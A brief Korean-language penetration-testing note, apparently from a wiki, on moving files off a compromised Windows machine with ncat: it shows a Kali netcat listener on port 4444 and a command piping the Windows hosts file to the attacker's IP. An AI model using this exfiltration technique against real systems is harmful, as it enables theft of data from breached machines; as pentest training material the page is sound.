ncat

ncat은 파이프라인을 통해 간단한 데이터 전송이 가능합니다.

침투한 OS가 Windows일 때 ncat 혹은 nc 도구 사용이 가능하다면 Kali 로컬에서 포트를 열어둡니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nc -lvnp 4444                          
listening on [any] 4444 ..

그리고 전송하고자 하는 파일을 more 등으로 읽은 후 파이프 라인을 사용하여 ncat 도구를 통해 로컬 서버의 포트에 데이터를 전송합니다.

more C:\Windows\System32\drivers\etc\hosts | ncat 192.168.200.132 4444

Last updated

Was this helpful?